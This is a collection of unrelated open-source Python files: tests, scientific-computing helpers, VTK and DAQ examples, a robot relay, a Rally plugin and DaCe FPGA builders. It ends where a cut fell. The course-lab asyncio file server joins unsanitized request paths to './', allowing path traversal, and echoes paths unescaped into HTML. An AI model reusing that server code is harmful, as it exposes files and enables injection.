path: settings/tests/test_global_settings.py | repo: stanwood/traidoo-api @ 83e8599f2eb54352988bac27e2d4acd30734816d | licenses: ["MIT"]
stars: 3 (2020-05-05 to 2020-05-08) | issues: 160 (2020-05-19 to 2022-03-12) | forks: null
import pytest
from model_bakery import baker
pytestmark = pytest.mark.django_db
def test_get_global_settings(client_anonymous):
settings = baker.make_recipe("settings.global_setting")
response = client_anonymous.get("/global_settings")
assert response.json() == {"productVat": settings.product_vat}
hexsha: ee02c3e71989e00196fcabde81e3802364cd921e | size: 3,679 | ext: py | lang: Python
path: em_net/util/misc.py | repo: weihuang527/superhuman_network @ a89820bda4d0006198bac3bb5922a958ac87f2ae | licenses: ["MIT"]
stars: null | issues: null | forks: null
import sys
import numpy as np
import h5py
import random
import os
from subprocess import check_output
# 1. h5 i/o
def readh5(filename, datasetname):
    with h5py.File(filename, 'r') as fid:
        data = np.array(fid[datasetname])
    return data
def writeh5(filename, datasetname, dtarray):
    # write dtarray as a single gzip-compressed dataset
    fid = h5py.File(filename, 'w')
    ds = fid.create_dataset(datasetname, dtarray.shape, compression="gzip", dtype=dtarray.dtype)
    ds[:] = dtarray
    fid.close()
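# A quick round-trip check for the two helpers above (an illustrative sketch;
# the /tmp path is a made-up example and this function is never called here).
def _h5_roundtrip_example():
    arr = np.arange(6, dtype=np.float32).reshape(2, 3)
    writeh5('/tmp/_misc_demo.h5', 'main', arr)
    assert np.array_equal(readh5('/tmp/_misc_demo.h5', 'main'), arr)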
def readh5k(filename, datasetname):
    fid = h5py.File(filename, 'r')
    data = {}
    for kk in datasetname:
        data[kk] = np.array(fid[kk])
    fid.close()
    return data
def writeh5k(filename, datasetname, dtarray):
fid=h5py.File(filename,'w')
for kk in datasetname:
ds = fid.create_dataset(kk, dtarray[kk].shape, compression="gzip", dtype=dtarray[kk].dtype)
ds[:] = dtarray[kk]
fid.close()
def resizeh5(path_in, path_out, dataset, ratio=(0.5,0.5), interp=2, offset=[0,0,0]):
from scipy.ndimage.interpolation import zoom
# for half-res
im = h5py.File( path_in, 'r')[ dataset ][:]
shape = im.shape
if len(shape)==3:
im_out = np.zeros((shape[0]-2*offset[0], int(np.ceil(shape[1]*ratio[0])), int(np.ceil(shape[2]*ratio[1]))), dtype=im.dtype)
        for i in range(shape[0] - 2 * offset[0]):
im_out[i,...] = zoom( im[i+offset[0],...], zoom=ratio, order=interp)
if offset[1]!=0:
im_out=im_out[:,offset[1]:-offset[1],offset[2]:-offset[2]]
elif len(shape)==4:
im_out = np.zeros((shape[0]-2*offset[0], shape[1], int(shape[2]*ratio[0]), int(shape[3]*ratio[1])), dtype=im.dtype)
        for i in range(shape[0] - 2 * offset[0]):
            for j in range(shape[1]):
im_out[i,j,...] = zoom( im[i+offset[0],j,...], ratio, order=interp)
if offset[1]!=0:
im_out=im_out[:,offset[1]:-offset[1],offset[2]:-offset[2],offset[3]:-offset[3]]
if path_out is None:
return im_out
writeh5(path_out, dataset, im_out)
def writetxt(filename, dtarray):
a = open(filename,'w')
a.write(dtarray)
a.close()
# 2. segmentation wrapper
def segToAffinity(seg):
from ..lib import malis_core as malisL
nhood = malisL.mknhood3d()
return malisL.seg_to_affgraph(seg,nhood)
def bwlabel(mat):
    ran = [int(mat.min()), int(mat.max())]
    out = np.zeros(ran[1] - ran[0] + 1)
for i in range(ran[0],ran[1]+1):
out[i] = np.count_nonzero(mat==i)
return out
def genSegMalis(gg3,iter_num): # given input seg map, widen the seg border
from scipy.ndimage import morphology as skmorph
#from skimage import morphology as skmorph
gg3_dz = np.zeros(gg3.shape).astype(np.uint32)
gg3_dz[1:,:,:] = (np.diff(gg3,axis=0))
gg3_dy = np.zeros(gg3.shape).astype(np.uint32)
gg3_dy[:,1:,:] = (np.diff(gg3,axis=1))
gg3_dx = np.zeros(gg3.shape).astype(np.uint32)
gg3_dx[:,:,1:] = (np.diff(gg3,axis=2))
gg3g = ((gg3_dx+gg3_dy)>0)
#stel=np.array([[1, 1],[1,1]]).astype(bool)
#stel=np.array([[0, 1, 0],[1,1,1], [0,1,0]]).astype(bool)
stel=np.array([[1, 1, 1],[1,1,1], [1,1,1]]).astype(bool)
#stel=np.array([[1,1,1,1],[1, 1, 1, 1],[1,1,1,1],[1,1,1,1]]).astype(bool)
gg3gd=np.zeros(gg3g.shape)
for i in range(gg3g.shape[0]):
gg3gd[i,:,:]=skmorph.binary_dilation(gg3g[i,:,:],structure=stel,iterations=iter_num)
out = gg3.copy()
out[gg3gd==1]=0
#out[0,:,:]=0 # for malis
return out
# 3. evaluation
"""
def runBash(cmd):
fn = '/tmp/tmp_'+str(random.random())[2:]+'.sh'
print('tmp bash file:',fn)
writetxt(fn, cmd)
    os.chmod(fn, 0o755)
out = check_output([fn])
os.remove(fn)
print(out)
"""
hexsha: ee02e152f754c131475d2144d7eda38e3e662a80 | size: 3,277 | ext: py | lang: Python
path: Examples/VisualizationAlgorithms/Python/warpComb.py | repo: satya-arjunan/vtk8 @ ee7ced57de6d382a2d12693c01e2fcdac350b25f | licenses: ["BSD-3-Clause"]
stars: 3 (2015-07-28 to 2018-02-28) | issues: 14 (2015-04-25 to 2017-01-13) | forks: 5 (2020-10-02 to 2022-03-10)
#!/usr/bin/env python
# This example demonstrates how to extract "computational planes" from
# a structured dataset. Structured data has a natural, logical
# coordinate system based on i-j-k indices. Specifying imin,imax,
# jmin,jmax, kmin,kmax pairs can indicate a point, line, plane, or
# volume of data.
#
# In this example, we extract three planes and warp them using scalar
# values in the direction of the local normal at each point. This
# gives a sort of "velocity profile" that indicates the nature of the
# flow.
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Here we read data from an annular combustor. A combustor burns fuel
# and air in a gas turbine (e.g., a jet engine) and the hot gas
# eventually makes its way to the turbine section.
pl3d = vtk.vtkMultiBlockPLOT3DReader()
pl3d.SetXYZFileName(VTK_DATA_ROOT + "/Data/combxyz.bin")
pl3d.SetQFileName(VTK_DATA_ROOT + "/Data/combq.bin")
pl3d.SetScalarFunctionNumber(100)
pl3d.SetVectorFunctionNumber(202)
pl3d.Update()
pl3d_output = pl3d.GetOutput().GetBlock(0)
# Planes are specified using a imin,imax, jmin,jmax, kmin,kmax
# coordinate specification. Min and max i,j,k values are clamped to 0
# and maximum value.
plane = vtk.vtkStructuredGridGeometryFilter()
plane.SetInputData(pl3d_output)
plane.SetExtent(10, 10, 1, 100, 1, 100)
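# SetExtent takes (imin, imax, jmin, jmax, kmin, kmax); with imin == imax each
# of these filters extracts a single constant-i computational plane.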
plane2 = vtk.vtkStructuredGridGeometryFilter()
plane2.SetInputData(pl3d_output)
plane2.SetExtent(30, 30, 1, 100, 1, 100)
plane3 = vtk.vtkStructuredGridGeometryFilter()
plane3.SetInputData(pl3d_output)
plane3.SetExtent(45, 45, 1, 100, 1, 100)
# We use an append filter because that way we can do the warping,
# etc. just using a single pipeline and actor.
appendF = vtk.vtkAppendPolyData()
appendF.AddInputConnection(plane.GetOutputPort())
appendF.AddInputConnection(plane2.GetOutputPort())
appendF.AddInputConnection(plane3.GetOutputPort())
warp = vtk.vtkWarpScalar()
warp.SetInputConnection(appendF.GetOutputPort())
warp.UseNormalOn()
warp.SetNormal(1.0, 0.0, 0.0)
warp.SetScaleFactor(2.5)
normals = vtk.vtkPolyDataNormals()
normals.SetInputConnection(warp.GetOutputPort())
normals.SetFeatureAngle(60)
planeMapper = vtk.vtkPolyDataMapper()
planeMapper.SetInputConnection(normals.GetOutputPort())
planeMapper.SetScalarRange(pl3d_output.GetScalarRange())
planeActor = vtk.vtkActor()
planeActor.SetMapper(planeMapper)
# The outline provides context for the data and the planes.
outline = vtk.vtkStructuredGridOutlineFilter()
outline.SetInputData(pl3d_output)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0, 0, 0)
# Create the usual graphics stuff.
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren.AddActor(outlineActor)
ren.AddActor(planeActor)
ren.SetBackground(1, 1, 1)
renWin.SetSize(500, 500)
# Create an initial view.
cam1 = ren.GetActiveCamera()
cam1.SetClippingRange(3.95297, 50)
cam1.SetFocalPoint(8.88908, 0.595038, 29.3342)
cam1.SetPosition(-12.3332, 31.7479, 41.2387)
cam1.SetViewUp(0.060772, -0.319905, 0.945498)
iren.Initialize()
renWin.Render()
iren.Start()
hexsha: ee05a479ec4cb10a4599fc18fc14885ce8e8c098 | size: 1,751 | ext: py | lang: Python
path: examples/console/a_in.py | repo: Picarro-kskog/mcculw @ 5a00dfbef2426772f0ec381f7795a2d5fd696a76 | licenses: ["MIT"]
stars: null | issues: null | forks: null
from __future__ import absolute_import, division, print_function
from builtins import * # @UnusedWildImport
from mcculw import ul
from mcculw.ul import ULError
from examples.console import util
from examples.props.ai import AnalogInputProps
use_device_detection = True
def run_example():
board_num = 0
if use_device_detection:
ul.ignore_instacal()
if not util.config_first_detected_device(board_num):
print("Could not find device.")
return
channel = 0
ai_props = AnalogInputProps(board_num)
if ai_props.num_ai_chans < 1:
util.print_unsupported_example(board_num)
return
ai_range = ai_props.available_ranges[0]
try:
# Get a value from the device
if ai_props.resolution <= 16:
# Use the a_in method for devices with a resolution <= 16
value = ul.a_in(board_num, channel, ai_range)
# Convert the raw value to engineering units
eng_units_value = ul.to_eng_units(board_num, ai_range, value)
else:
# Use the a_in_32 method for devices with a resolution > 16
# (optional parameter omitted)
value = ul.a_in_32(board_num, channel, ai_range)
# Convert the raw value to engineering units
eng_units_value = ul.to_eng_units_32(board_num, ai_range, value)
# Display the raw value
print("Raw Value: " + str(value))
# Display the engineering value
print("Engineering Value: " + '{:.3f}'.format(eng_units_value))
except ULError as e:
util.print_ul_error(e)
finally:
if use_device_detection:
ul.release_daq_device(board_num)
if __name__ == '__main__':
run_example()
hexsha: ee05eaf652dcacea5d625e928ba76476b8f2f36d | size: 721 | ext: py | lang: Python
path: Communication_adaptor/OOCSI/main.py | repo: tahir80/Crowd_of_Oz @ a79e1e8a10b99879aeff83b00ef89b480c8d168c | licenses: ["MIT"]
stars: null | issues: 3 (2021-03-19 to 2022-01-13) | forks: 2 (2020-02-19 to 2022-01-17)
from oocsi import OOCSI
from NAO_Speak import NAO_Speak # (file name followed by class name)
import unidecode
#################################
IP = "IP_OF_PEPPER_ROBOT"
text = ""
my_nao = NAO_Speak(IP, 9559)
##################################
def receiveEvent(sender, recipient, event):
print('from ', sender, ' -> ', event)
# this will convert unicode string to plain string
msg = str(event['message'])
sender = str(sender)
x, y = sender.split('_')
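    # e.g. a sender id of the form 'webclient_42' splits into x = 'webclient'
    # and y = '42' (hypothetical id, shown for illustration)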
if x == 'webclient':
my_nao.say_text(msg)
if __name__ == "__main__":
#o = OOCSI('abc', "oocsi.id.tue.nl", callback=receiveEvent)
o = OOCSI('pepper_receiver', 'oocsi.id.tue.nl')
o.subscribe('__test123__', receiveEvent)
hexsha: ee06d5c5bec6e01c97e370a892a4bf6a429c5e09 | size: 8,161 | ext: py | lang: Python
path: CS305_Computer-Network/Lab6-cdn-dash/web_file_system_server.py | repo: Eveneko/SUSTech-Courses @ 0420873110e91e8d13e6e85a974f1856e01d28d6 | licenses: ["MIT"]
stars: 4 (2020-11-11 to 2021-03-11) | issues: null | forks: 3 (2021-01-07 to 2021-04-27)
# encoding:utf-8
import asyncio
import os
import mimetypes
from urllib import parse
response = {
    # 200: [b'HTTP/1.0 200 OK\r\n',  # response for a normal request
# b'Connection: close\r\n',
# b'Content-Type:text/html; charset=utf-8\r\n',
# b'\r\n'],
    404: [b'HTTP/1.0 404 Not Found\r\n',  # response when the requested file does not exist
b'Connection: close\r\n',
b'Content-Type:text/html; charset=utf-8\r\n',
b'\r\n',
b'<html><body>404 Not Found<body></html>\r\n',
b'\r\n'],
    405: [b'HTTP/1.0 405 Method Not Allowed\r\n',  # response when the request method is neither GET nor HEAD
b'Connection: close\r\n',
b'Content-Type:text/html; charset=utf-8\r\n',
b'\r\n',
b'<html><body>405 Method Not Allowed<body></html>\r\n',
b'\r\n'],
416: [b'HTTP/1.0 416 Requested Range Not Satisfiable\r\n', # Range Header error
b'Connection: close\r\n',
b'Content-Type:text/html; charset=utf-8\r\n',
b'\r\n',
b'<html><body>416 Requested Range Not Satisfiable<body></html>\r\n',
b'\r\n']
}
# get mime by mimetypes.guess_type
def get_mime(path):
    mime = mimetypes.guess_type(path)[0]  # the file type; the browser decides whether to display or download it
    if mime is None:  # if the browser cannot render the type, force a download
        mime = 'application/octet-stream'
return mime
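# Illustrative examples (added): get_mime('index.html') returns 'text/html' and
# get_mime('movie.mp4') returns 'video/mp4'; an unknown extension falls back to
# 'application/octet-stream'.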
# separate the raw cookie info to get the location
def get_cookie(raw_cookie):
for content in raw_cookie:
cookie = content.strip('\r\n').split(' ')
for sub_cookie in cookie:
if 'loc=' in sub_cookie:
return sub_cookie.strip(';').replace('path=/', '')
async def dispatch(reader, writer):
header = {}
while True:
data = await reader.readline()
if data == b'\r\n':
break
if data == b'':
break
message = data.decode().split(' ')
        # split the header line and store the fields in the dictionary
if message[0] == 'GET' or message[0] == 'HEAD':
header['METHOD'] = message[0]
header['PATH'] = message[1]
if message[0] == 'Range:':
header['RANGE'] = message[1]
if message[0] == 'Cookie:':
header['COOKIE'] = message
if message[0] == 'Referer:':
header['REFERER'] = message[1]
if message[0] == 'Host:':
header['HOST'] = message[1]
"""test start"""
print('----------header')
print(header)
print('----------header')
"""test end"""
# Handle the header
r_head = []
r = []
if 'METHOD' not in header:
# if the request is not GET or HEAD
writer.writelines(response[405])
await writer.drain()
writer.close()
return
cookie = ''
if 'COOKIE' in header:
# get the location
cookie = get_cookie(header['COOKIE'])
"""test start"""
# print('----------cookie')
# print(cookie)
# print('----------cookie')
"""test end"""
# set http status
if 'RANGE' in header:
r_head.append(b'HTTP/1.0 206 Partial Content\r\n')
else:
if header['PATH'] == '/' and 'REFERER' not in header and 'COOKIE' in header and \
'loc=' in cookie and cookie != 'loc=/':
r_head.append(b'HTTP/1.0 302 Found\r\n')
else:
r_head.append(b'HTTP/1.0 200 OK\r\n')
# make the 302 header
if header['PATH'] == '/' and 'REFERER' not in header and 'COOKIE' in header and \
'loc=' in cookie and cookie != 'loc=/':
cookie_loc = cookie[4:]
header['HOST'] = header['HOST'].strip('\r\n')
url = 'http://' + header['HOST'] + cookie_loc
"""test start"""
print('----------url')
print(url)
print('----------url')
"""test end"""
r_head.append('Location: {}\r\n\r\n'.format(url).encode('utf-8'))
# set max-age for a day
r_head.append('Cache-control: private; max-age={}\r\n\r\n'.format(86400).encode('utf-8'))
print(r_head)
writer.writelines(r_head)
await writer.drain()
writer.close()
return
    # if header['PATH'] == 'favicon.ico':  # Chrome sends an extra favicon request; ignore it
    #     pass
    # else:
path = './' + header['PATH']
    try:  # URL-decode the path
path = parse.unquote(path, errors='surrogatepass')
except UnicodeDecodeError:
path = parse.unquote(path)
    if os.path.isfile(path):  # the path points to a regular file
file_size = int(os.path.getsize(path))
start_index = 0
end_index = file_size - 1
length = file_size
if 'RANGE' in header:
# divide the piece of file
start_index, end_index = header['RANGE'].strip('bytes=').split('-')
# -
if start_index == '' and end_index == '' or end_index == '\r\n':
start_index, end_index = 0, file_size-1
# x-
elif end_index == '' or end_index == '\r\n':
start_index, end_index = int(start_index), file_size-1
# -x
elif start_index == '':
end_index = int(end_index)
start_index = file_size - end_index
end_index = file_size - 1
# x-x
start_index = int(start_index)
end_index = int(end_index)
length = end_index - start_index + 1
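        # Worked examples of the parsing above (added for clarity):
        #   'bytes=0-499' -> start 0, end 499, length 500
        #   'bytes=500-'  -> start 500, end file_size - 1
        #   'bytes=-500'  -> the final 500 bytes of the file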
if start_index < 0 or end_index >= file_size or start_index > end_index:
writer.writelines(response[416])
await writer.drain()
writer.close()
return
r_head.append(
'Content-Range: bytes {}-{}/{}\r\n'.format(start_index, end_index, file_size).encode('utf-8'))
# guess the type
mime = get_mime(path)
r_head.append('Content-Type: {}\r\n'.format(mime).encode('utf-8'))
r_head.append('Content-Length: {}\r\n'.format(length).encode('utf-8'))
r_head.append(b'Connection: close\r\n')
r_head.append(b'\r\n')
writer.writelines(r_head)
if header['METHOD'] == 'GET':
file = open(path, 'rb')
file.seek(start_index)
writer.write(file.read(length))
file.close()
    elif os.path.isdir(path):  # the path points to a directory
r_head.append(b'Connection: close\r\n')
r_head.append(b'Content-Type:text/html; charset=utf-8\r\n')
r_head.append('Set-Cookie: loc={};path=/\r\n'.format(header['PATH']).encode('utf-8'))
r_head.append(b'\r\n')
if header['METHOD'] == 'HEAD':
writer.writelines(r_head)
elif header['METHOD'] == 'GET':
writer.writelines(r_head)
            file_list = os.listdir(path)  # list the entries in the directory
r.append(b'<html>')
r.append(b'<head><title>Index of %s</title></head>' %
(path.encode('utf-8')))
r.append(b'<body bgcolor="white">')
r.append(b'<h1>Index of %s</h1><hr>' %
(path.encode('utf-8')))
r.append(b'<ul>')
if path != './':
r.append(b'<li><a href=".."> ../ </a></li>')
for name in file_list:
if os.path.isdir(path + name + '/'):
name = name + '/'
r.append(b'<li><a href="%s"> %s </a></li>' %
(name.encode('utf-8'), name.encode('utf-8')))
r.append(b'</ul>')
r.append(b'</body>')
r.append(b'</html>')
writer.writelines(r)
else:
writer.writelines(response[404])
await writer.drain()
writer.close()
if __name__ == '__main__':
    loop = asyncio.get_event_loop()  # create the event loop
coro = asyncio.start_server(
        dispatch, '127.0.0.1', 8080, loop=loop)  # start a new server coroutine
    server = loop.run_until_complete(coro)  # run the coroutine on the event loop to set up the server
# Serve requests until Ctrl+C is pressed
print('Serving on {}'.format(server.sockets[0].getsockname()))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
    server.close()  # shut down the server
    # keep waiting until the underlying connections are closed; this should be called after close()
loop.run_until_complete(server.wait_closed())
loop.close()
hexsha: ee0caea10657e730ca0edcf6cea3ad5049994afa | size: 2,111 | ext: py | lang: Python
path: rally/rally-plugins/glance/glance_create_boot_delete.py | repo: jsitnicki/browbeat @ f5f9dcef2375a28fed8cc97f973eeecabd2114b7 | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: 1 (2019-12-01 to 2019-12-01)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rally.plugins.openstack.scenarios.glance.images import GlanceBasic
from rally.plugins.openstack.scenarios.neutron import utils as neutron_utils
from rally.plugins.openstack.scenarios.nova import utils as nova_utils
from rally.task import scenario
from rally.task import types
from rally.task import validation
from rally import consts
@types.convert(flavor={"type": "nova_flavor"}, image_location={"type": "path_or_url"})
@validation.add("required_services",
services=[consts.Service.GLANCE, consts.Service.NEUTRON, consts.Service.NOVA])
@validation.add("required_platform", platform="openstack", users=True)
@scenario.configure(context={"cleanup@openstack": ["glance", "neutron", "nova"]},
name="BrowbeatPlugin.glance_create_boot_delete",
platform="openstack")
class GlanceCreateBootDelete(GlanceBasic, neutron_utils.NeutronScenario, nova_utils.NovaScenario):
def run(self, container_format, image_location, disk_format, flavor,
network_create_args=None, subnet_create_args=None, **kwargs):
image = self.glance.create_image(
container_format=container_format, image_location=image_location,
disk_format=disk_format)
net = self._create_network(network_create_args or {})
self._create_subnet(net, subnet_create_args or {})
kwargs['nics'] = [{'net-id': net['network']['id']}]
server = self._boot_server(image.id, flavor, **kwargs)
self._delete_server(server)
self.glance.delete_image(image.id)
hexsha: ee0cf6c256acb1e19d545ad5310115b214f0b6ae | size: 11,168 | ext: py | lang: Python
path: Evaluation/hbm_axpy_dot_based.py | repo: jnice-81/FpgaHbmForDaCe @ b80749524264b4884cbd852d2db825cf8a6007aa | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null
from typing import List
import dace
from dace import subsets
from dace import memlet
from dace import dtypes
from dace.sdfg.sdfg import InterstateEdge, SDFG
from dace.sdfg.state import SDFGState
from dace.transformation.interstate.sdfg_nesting import NestSDFG
from dace.transformation.optimizer import Optimizer
from dace.transformation.interstate import InlineSDFG, FPGATransformSDFG
from dace.transformation.dataflow import StripMining
from dace.sdfg import graph, nodes, propagation, utils
from dace.libraries.blas.nodes import dot
from hbm_transform import HbmTransform
from hbm_bank_split import HbmBankSplit
from hbm_transform import set_shape
from hbm_transform import transform_sdfg_for_hbm
from hbm_transform import all_innermost_edges
from helper import *
######## Simple base versions of the pure blas applications without HBM use
def simple_vadd_sdfg(N, vec_len=16, tile_size=4096):
alpha = dace.symbol("alpha", dtype=dace.float32)
@dace.program
def axpy(x: dace.vector(dace.float32, vec_len)[N/vec_len],
y: dace.vector(dace.float32, vec_len)[N/vec_len],
z: dace.vector(dace.float32, vec_len)[N/vec_len]):
for i in dace.map[0:N/vec_len]:
with dace.tasklet:
xin << x[i]
yin << y[i]
zout >> z[i]
zout = xin + yin * alpha
sdfg = axpy.to_sdfg()
sdfg.apply_strict_transformations()
sdfg.apply_transformations(StripMining, {"tile_size": tile_size, "divides_evenly": True})
map = get_first_node(sdfg.start_state, lambda x: isinstance(x, nodes.MapEntry) and x.map.params[0] == "i")
map.map.schedule = dtypes.ScheduleType.FPGA_Device
return sdfg
def simple_dot_sdfg(N, tile_size=8192):
sdfg: SDFG = SDFG("dot")
state = sdfg.add_state()
sdfg.add_array("x", [N/8], dace.vector(dace.float32, 8), dtypes.StorageType.FPGA_Global)
sdfg.add_array("y", [N/8], dace.vector(dace.float32, 8), dtypes.StorageType.FPGA_Global)
sdfg.add_array("result", [1], dace.float32, dtypes.StorageType.FPGA_Global)
lib_node = dot.Dot("dot")
state.add_node(lib_node)
read_x = state.add_read("x")
read_y = state.add_read("y")
write_result = state.add_write("result")
state.add_edge(read_x, None, lib_node, "_x", memlet.Memlet("x"))
state.add_edge(read_y, None, lib_node, "_y", memlet.Memlet("y"))
    state.add_edge(lib_node, "_result", write_result, None, memlet.Memlet("result"))
lib_node.implementation = "FPGA_PartialSums"
lib_node.expand(sdfg, state, partial_width=64, n=N)
sdfg.arrays["x"].storage = dtypes.StorageType.Default
sdfg.arrays["y"].storage = dtypes.StorageType.Default
sdfg.arrays["result"].storage = dtypes.StorageType.Default
strip_map = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and x.label == "stream")
for nsdfg in sdfg.all_sdfgs_recursive():
if nsdfg.states()[0].label == "stream":
StripMining.apply_to(nsdfg, {"tile_size": tile_size, "divides_evenly": True}, _map_entry=strip_map)
state = nsdfg.start_state
tile_map = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and x.label == "stream"
and x.map.params[0] == "i")
tile_map.map.schedule = dtypes.ScheduleType.FPGA_Device
break
return sdfg
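# Hedged usage sketch (not in the original file): how the simple builders above
# might be compiled and run. Assumes a DaCe install with an FPGA backend or
# software emulation configured; `n` and the flat float32 views are illustrative
# assumptions, and vector-typed arguments may need adapting across DaCe versions.
def _example_run_simple_vadd(n=4096 * 16, alpha_value=2.0):
    import numpy as np
    sdfg = simple_vadd_sdfg(dace.symbol("N"))
    x = np.random.rand(n).astype(np.float32)
    y = np.random.rand(n).astype(np.float32)
    z = np.zeros(n, dtype=np.float32)
    compiled = sdfg.compile()
    # Symbols (N, alpha) are bound by keyword at call time
    compiled(x=x, y=y, z=z, N=n, alpha=np.float32(alpha_value))
    assert np.allclose(z, x + alpha_value * y)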
######### On-device HBM implementations of pure BLAS
def hbm_axpy_sdfg(banks_per_input: int):
N = dace.symbol("N")
sdfg = simple_vadd_sdfg(N)
map = get_first_node(sdfg.start_state, lambda x: isinstance(x, nodes.MapEntry) and x.map.params[0] == "tile_i")
banks = {"x": ("HBM", f"0:{banks_per_input}", [banks_per_input]),
"y": ("HBM", f"{banks_per_input}:{2*banks_per_input}", [banks_per_input]),
"z": ("HBM", f"{2*banks_per_input}:{3*banks_per_input}", [banks_per_input])}
transform_sdfg_for_hbm(sdfg, ("k", banks_per_input), banks, {(map, 0): banks_per_input})
return sdfg
def hbm_dot_sdfg(banks_per_input: int):
N = dace.symbol("N")
sdfg = simple_dot_sdfg(N)
state = sdfg.states()[0]
for edge, state in sdfg.all_edges_recursive():
if isinstance(edge, graph.MultiConnectorEdge):
if isinstance(edge.dst, nodes.AccessNode) and edge.dst.data == "_result":
edge.data.other_subset = subsets.Range.from_string("k")
set_shape(state.parent.arrays["_result"], [banks_per_input])
if isinstance(edge.dst, nodes.AccessNode) and edge.dst.data == "result":
                    # One cannot update the other_subset here; doing so leads to
                    # problems with out-of-bounds checking:
                    # edge.data.other_subset = subsets.Range.from_string("k")
set_shape(state.parent.arrays["result"], [banks_per_input])
array_banks = {"x": ("HBM", f"0:{banks_per_input}", [banks_per_input]),
"y": ("HBM", f"{banks_per_input}:{2*banks_per_input}", [banks_per_input]),
"result": ("DDR", "0", None)}
div_map = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and x.label == "stream"
and x.map.params[0] == "tile_i")
transform_sdfg_for_hbm(sdfg, ("k", banks_per_input),
array_banks, {(div_map.map, 0): banks_per_input}, True)
return sdfg
######### Full implementations of pure BLAS applications
def only_hbm_axpy_sdfg(banks_per_input: int):
sdfg = hbm_axpy_sdfg(banks_per_input)
sdfg.apply_fpga_transformations()
sdfg.apply_transformations_repeated(InlineSDFG)
z_access1 = get_first_node(sdfg.start_state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "z")
sdfg.start_state.remove_nodes_from([sdfg.start_state.out_edges(z_access1)[0].dst, z_access1])
distribute_along_dim0(sdfg, ["x", "y", "z"])
return sdfg
def _modify_dot_host_side(sdfg, start_state, end_state):
# Add final reduction
state = end_state
host_result = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "result")
sum_up = state.add_reduce("lambda a, b : a + b", None, 0)
sdfg.add_array("final_result", [1], dace.float32)
host_final = state.add_access("final_result")
state.add_edge(host_result, None, sum_up, None, memlet.Memlet("result"))
state.add_edge(sum_up, None, host_final, None, memlet.Memlet("final_result[0]"))
sum_up.expand(sdfg, state)
sdfg.apply_transformations(InlineSDFG)
# Remove copy result
state = start_state
access_result_start = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "result")
state.remove_nodes_from([state.out_edges(access_result_start)[0].dst, access_result_start])
sdfg.arrays["result"].transient = True
def only_hbm_dot_sdfg(banks_per_input: int):
sdfg = hbm_dot_sdfg(banks_per_input)
sdfg.apply_fpga_transformations()
sdfg.apply_transformations_repeated(InlineSDFG)
distribute_along_dim0(sdfg, ["x", "y"])
_modify_dot_host_side(sdfg, sdfg.start_state, sdfg.states()[2])
return sdfg
def hbm_axpy_dot(banks_per_input: int):
N = dace.symbol("N")
axpy_sdfg = simple_vadd_sdfg(N, vec_len=8, tile_size=8192)
dot_sdfg = simple_dot_sdfg(N, tile_size=8192)
sdfg = SDFG("axpydot")
sdfg.add_symbol("alpha", dace.float32)
state = sdfg.add_state()
sdfg.add_array("axpy_x", [N//8], dace.vector(dace.float32, 8))
sdfg.add_array("axpy_y", [N//8], dace.vector(dace.float32, 8))
sdfg.add_array("dot_y", [N//8], dace.vector(dace.float32, 8))
sdfg.add_array("middle", [N//8], dace.vector(dace.float32, 8), transient=True)
sdfg.add_array("result", [banks_per_input], dace.float32)
acc_axpy_x = state.add_access("axpy_x")
acc_axpy_y = state.add_access("axpy_y")
acc_dot_y = state.add_access("dot_y")
acc_middle = state.add_access("middle")
acc_result = state.add_access("result")
axpynode = state.add_nested_sdfg(axpy_sdfg, sdfg, set(["x", "y", "z"]), set(["z"]), {"N": N, "alpha": "alpha"})
dotnode = state.add_nested_sdfg(dot_sdfg, sdfg, set(["x", "y", "result"]), set(["result"]), {"N": N})
acc_middle_dummy = state.add_access("middle")
acc_middle_dummy_2 = state.add_access("middle")
acc_result_dummy = state.add_access("result")
state.add_edge(acc_axpy_x, None, axpynode, "x", memlet.Memlet("axpy_x"))
state.add_edge(acc_axpy_y, None, axpynode, "y", memlet.Memlet("axpy_y"))
state.add_edge(acc_middle_dummy, None, axpynode, "z", memlet.Memlet("middle"))
state.add_edge(axpynode, "z", acc_middle, None, memlet.Memlet("middle"))
state.add_edge(acc_middle_dummy_2, None, dotnode, "x", memlet.Memlet("middle"))
state.add_edge(acc_dot_y, None, dotnode, "y", memlet.Memlet("dot_y"))
state.add_edge(acc_result_dummy, None, dotnode, "result", memlet.Memlet("result"))
state.add_edge(dotnode, "result", acc_result, None, memlet.Memlet("result"))
sdfg.apply_transformations_repeated(InlineSDFG)
def _nodes_from_path(path):
nodes = [path[0].src]
for edge in path:
nodes.append(edge.dst)
return nodes
sdfg.add_stream("connect", dace.vector(dace.float32, 8), 128, [banks_per_input],
storage=dtypes.StorageType.FPGA_Local, transient=True)
old_acc_node = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "middle"
and state.in_degree(x) == 1)
update_access(state, old_acc_node, "connect", memlet.Memlet("connect[k]"))
old_acc_node = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "middle"
and state.out_degree(x) == 1)
update_access(state, old_acc_node, "connect", memlet.Memlet("connect[k]"))
acc_result = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "result")
path = state.memlet_path(state.in_edges(acc_result)[0])
path[0].data.subset = subsets.Range.from_string("k")
